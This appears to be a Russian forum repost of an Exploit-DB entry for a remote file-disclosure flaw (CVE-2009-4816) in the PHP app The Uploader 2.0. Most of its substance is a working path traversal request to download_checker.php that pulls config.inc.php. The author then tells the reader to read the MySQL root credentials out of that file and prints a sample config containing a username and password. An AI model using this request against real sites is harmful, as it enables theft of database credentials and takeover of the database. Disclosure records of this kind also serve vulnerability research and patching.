- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10599
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4816
- Дата публикации
- 2009-12-22
Код:
# Title: The Uploader 2.0 Remote File disclosure Vulnerability
# Author: Stack
http://server/the_uploader/api/download_checker.php?filename=../config.inc.php
next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d
//MySQL configuration and connection functions
$main['host']="127.0.0.1";
$main['user']="root";
$main['pass']="jH445Ui";
$main['dbnm']="jkL_database";- Источник
- www.exploit-db.com
